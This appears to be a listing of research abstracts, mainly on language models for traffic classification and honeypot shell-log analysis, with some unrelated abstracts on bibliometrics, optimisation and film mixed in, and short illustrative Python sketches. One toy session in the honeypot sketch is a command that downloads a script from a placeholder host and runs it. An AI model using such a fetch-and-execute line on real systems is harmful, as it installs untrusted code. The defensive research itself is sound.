Language Models and Cybersecurity - Applications and Current Limits
The abstract is in the attachment
The Sweet Danger of Sugar: Debunking Representation Learning for Encrypted Traffic Classification
Recently we have witnessed the explosion of proposals that, inspired by Language Models like BERT, exploit Representation Learning models to create traffic representations. All of them promise astonishing performance in encrypted traffic classification (up to 98% accuracy). In this paper, with a networking expert mindset, we critically reassess their performance. Through extensive analysis, we demonstrate that the reported successes are heavily influenced by data preparation problems, which allow these models to find easy shortcuts - spurious correlation between features and labels - during fine-tuning that unrealistically boost their performance. When such shortcuts are not present - as in real scenarios - these models perform poorly. We also introduce Pcap-Encoder, an LM-based representation learning model that we specifically design to extract features from protocol headers. Pcap-Encoder appears to be the only model that provides an instrumental representation for traffic classification. Yet, its complexity questions its applicability in practical settings. Our findings reveal flaws in dataset preparation and model training, calling for a better and more conscious test design. We propose a correct evaluation methodology and stress the need for rigorous benchmarking
Neural combinatorial optimization beyond the TSP: Existing architectures under-represent graph structure
Recent years have witnessed the promise that reinforcement learning, coupled with Graph Neural Network (GNN) architectures, could learn to solve hard combinatorial optimization problems: given raw input data and an evaluator to guide the process, the idea is to automatically learn a policy able to return feasible and high-quality outputs. Recent works have shown promising results but the latter were mainly evaluated on the travelling salesman problem (TSP) and similar abstract variants such as Split Delivery Vehicle Routing Problem (SDVRP). In this paper, we analyze how and whether recent neural architectures can be applied to graph problems of practical importance. We thus set out to systematically "transfer" these architectures to the Power and Channel Allocation Problem (PCAP), which has practical relevance for, e.g., radio resource allocation in wireless networks. Our experimental results suggest that existing architectures (i) are still incapable of capturing graph structural features and (ii) are not suitable for problems where the actions on the graph change the graph attributes. On a positive note, we show that augmenting the structural representation of problems with Distance Encoding is a promising step toward the still-ambitious goal of learning multi-purpose autonomous solvers
The polynomial robust knapsack problem
This paper introduces a new optimization problem, namely the Polynomial Robust Knapsack Problem. It generalises the Robust Knapsack formulation to encompass possible relations between subsets of items of every possible cardinality. This allows a better description of the decision maker's utility function, at the price of increasing the complexity of the problem. Thus, in order to solve realistic instances in a reasonable amount of time, two heuristics are proposed. The first one applies machine learning techniques in order to quickly select the majority of the items, while the second makes use of genetic algorithms to solve the problem. A set of simulation examples is finally presented to show the effectiveness of the proposed approaches
Towards NLP-based Processing of Honeypot Logs
Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time-consuming and cumbersome. Here we evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We use a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session into a metric space, comparing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain a few tens of clusters that we analyze to explain the attackers' goals, such as obtaining system information, injecting malicious accounts, and downloading and running executables. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities
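As an illustration of the parse-then-project steps described in this abstract, here is a minimal sketch using only the Python standard library. It is not the authors' pipeline: the tokenizer, the toy sessions and the choice of cosine similarity are assumptions made for the example, and the Word2Vec and clustering stages are omitted.

```python
import math
import re
from collections import Counter


def tokenize(session: str) -> list[str]:
    """Split a shell session into commands, options and parameters.

    Assumption: commands are chained with ';', '|', '||' or '&&' and
    tokens are whitespace-separated (no quoting or escaping handled).
    """
    tokens = []
    for command in re.split(r";|\|\||&&|\|", session):
        tokens.extend(command.split())
    return tokens


def bag_of_words(session: str) -> Counter:
    """Represent a session as token counts (Bag of Words)."""
    return Counter(tokenize(session))


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse count vectors."""
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


# Hypothetical sessions, invented for illustration only.
sessions = [
    "uname -a; cat /proc/cpuinfo",
    "uname -a; cat /proc/meminfo",
    "wget http://example.invalid/x.sh; chmod +x x.sh; ./x.sh",
]
vectors = [bag_of_words(s) for s in sessions]
```

In this toy data the two reconnaissance sessions share three of their four tokens, while the download-and-run session shares none with them, so a distance-based clustering step would be expected to separate the two behaviours.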
Going Beyond Counting First Authors in Author Co-citation Analysis
The present study examines one of the fundamental aspects of author co-citation analysis (ACA) - the way co-citation counts are defined. Co-citation counting provides the data on which all subsequent statistical analyses and mappings are based, and we compare ACA results based on two different types of co-citation counting - the traditional type that only counts the first one among a cited work's authors on the one hand and a non-traditional type that takes into account the first 5 authors of a cited work on the other hand. Results indicate that the picture produced through this non-traditional author co-citation counting contains more coherent author groups and is therefore considerably clearer. However, this picture represents fewer specialties in the research field being studied than that produced through the traditional first-author co-citation counting when the same number of top-ranked authors is selected and analyzed. Reasons for these effects are discussed
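The difference between the two counting schemes can be sketched as follows. This is an illustrative reading of the abstract, not the study's actual procedure: the function name `cocitation_counts`, the `max_authors` parameter and the toy reference lists are hypothetical, and the sketch makes the simplifying assumption that co-authors of the same cited work also count as a co-cited pair.

```python
from collections import Counter
from itertools import combinations


def cocitation_counts(citing_papers, max_authors):
    """Count author pairs that are cited together by the same paper.

    citing_papers: one reference list per citing paper; each reference
        is an ordered list of the cited work's authors.
    max_authors: number of leading authors of each cited work to count
        (1 = traditional first-author counting, 5 = first five authors).
    """
    counts = Counter()
    for references in citing_papers:
        cited_authors = set()
        for authors in references:
            cited_authors.update(authors[:max_authors])
        # Each unordered pair is counted once per citing paper.
        for pair in combinations(sorted(cited_authors), 2):
            counts[pair] += 1
    return counts


# Hypothetical data: two citing papers, authors named A-D.
papers = [
    [["A", "B"], ["C"]],
    [["A", "B"], ["D", "C"]],
]
first_author = cocitation_counts(papers, max_authors=1)
first_five = cocitation_counts(papers, max_authors=5)
```

With first-author counting, author B never appears and C is only visible where C is listed first; counting the first five authors recovers those pairs, at the cost of a denser matrix.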
Variations on the Author
“Variations on the Author” discusses two of Eduardo Coutinho’s recent films (Um Dia na Vida, from 2010, and Últimas Conversas, posthumously released in 2015) and their contribution to the general question of documentary authorship. The director’s filmography is characterized by a consistent yet self-effacing form of authorial self-inscription: Coutinho often features as an interviewer who, rather than expressing opinions, propels discourses; an interviewer who is good at listening. This mode of self-inscription characterizes him as an author who is not expressive but who is nonetheless markedly present on the screen. In Um Dia na Vida, however, Coutinho is completely absent from the image, while Últimas Conversas, on the contrary, includes a confessional prologue that moves the director from the margins to the center of his films. This article examines the ways in which these works stand out in the filmography of a director who offers new insights into the notion of cinematic authorship
Appropriate Similarity Measures for Author Cocitation Analysis
We provide a number of new insights into the methodological discussion about author cocitation analysis. We first argue that the use of the Pearson correlation for measuring the similarity between authors’ cocitation profiles is not very satisfactory. We then discuss what kind of similarity measures may be used as an alternative to the Pearson correlation. We consider three similarity measures in particular. One is the well-known cosine. The other two similarity measures have not been used before in the bibliometric literature. Finally, we show by means of an example that our findings have a high practical relevance.
Keywords: information science; Pearson correlation; cosine; similarity measure; author cocitation analysis
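One property that separates the two measures named here can be checked with a short sketch. The profiles below are invented, and the abstract does not say that this is the authors' argument; the example only demonstrates a mathematical fact: appending authors with whom neither profile is cocited (extra zeros) leaves the cosine unchanged but can change the Pearson correlation, here even flipping its sign.

```python
import math


def cosine(x, y):
    """Cosine similarity of two equal-length count vectors."""
    dot = sum(a * b for a, b in zip(x, y))
    norm_x = math.sqrt(sum(a * a for a in x))
    norm_y = math.sqrt(sum(b * b for b in y))
    return dot / (norm_x * norm_y)


def pearson(x, y):
    """Pearson correlation of two equal-length count vectors."""
    n = len(x)
    mean_x, mean_y = sum(x) / n, sum(y) / n
    cov = sum((a - mean_x) * (b - mean_y) for a, b in zip(x, y))
    dev_x = math.sqrt(sum((a - mean_x) ** 2 for a in x))
    dev_y = math.sqrt(sum((b - mean_y) ** 2 for b in y))
    return cov / (dev_x * dev_y)


# Hypothetical cocitation profiles of two authors with three others.
profile_a = [4, 0, 2]
profile_b = [0, 3, 2]

# The same profiles after adding 20 authors cocited with neither.
padded_a = profile_a + [0] * 20
padded_b = profile_b + [0] * 20

print(cosine(profile_a, profile_b), cosine(padded_a, padded_b))
print(pearson(profile_a, profile_b), pearson(padded_a, padded_b))
```

The Pearson value therefore depends on which other authors happen to be included in the analysis, whereas the cosine depends only on the authors with whom at least one of the two profiles has cocitations.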
LogPrécis: Unleashing Language Models for Automated Malicious Log Analysis
The collection of security-related logs holds the key to understanding attack behaviors and diagnosing vulnerabilities. Still, their analysis remains a daunting challenge. Recently, Language Models (LMs) have demonstrated unmatched potential in understanding natural and programming languages. The question arises whether and how LMs could be also useful for security experts since their logs contain intrinsically confused and obfuscated information. In this paper, we systematically study how to benefit from the state-of-the-art in LM to automatically analyze text-like Unix shell attack logs. We present a thorough design methodology that leads to LogPrécis. It receives as input raw shell sessions and automatically identifies and assigns the attacker tactic to each portion of the session, i.e., unveiling the sequence of the attacker's goals. We demonstrate LogPrécis' capability to support the analysis of two large datasets containing about 400,000 unique Unix shell attacks. LogPrécis reduces them into about 3,000 fingerprints, each grouping sessions with the same sequence of tactics. The abstraction it provides lets the analyst better understand attacks, identify fingerprints, detect novelty, link similar attacks, and track families and mutations. Overall, LogPrécis, released as open source, paves the way for better and more responsive defense against cyberattacks.
Comment: 18 pages, Computers & Security (https://www.sciencedirect.com/science/article/pii/S0167404824001068), code available at https://github.com/SmartData-Polito/logprecis, models available at https://huggingface.co/SmartDataPolit
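The fingerprinting idea in this abstract, grouping sessions that share the same sequence of tactics, can be sketched as below. This is not the LogPrécis code or API: it assumes the per-portion tactic labels have already been predicted, and the function name, session identifiers and tactic names are all hypothetical.

```python
from collections import defaultdict


def group_by_fingerprint(labelled_sessions):
    """Group session ids by their ordered sequence of tactics.

    labelled_sessions: dict mapping a session id to the list of tactic
        labels assigned to its consecutive portions (assumed given).
    Returns a dict mapping each fingerprint (a tuple of tactics) to the
    list of session ids that share it.
    """
    groups = defaultdict(list)
    for session_id, tactics in labelled_sessions.items():
        groups[tuple(tactics)].append(session_id)
    return dict(groups)


# Hypothetical labelled sessions, invented for illustration only.
labelled = {
    "s1": ["Discovery", "Execution"],
    "s2": ["Discovery", "Execution"],
    "s3": ["Persistence", "Discovery", "Execution"],
}
fingerprints = group_by_fingerprint(labelled)
```

Sessions `s1` and `s2` collapse into one fingerprint even if their raw commands differ, which is the kind of reduction the abstract reports (about 400,000 sessions into about 3,000 fingerprints).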
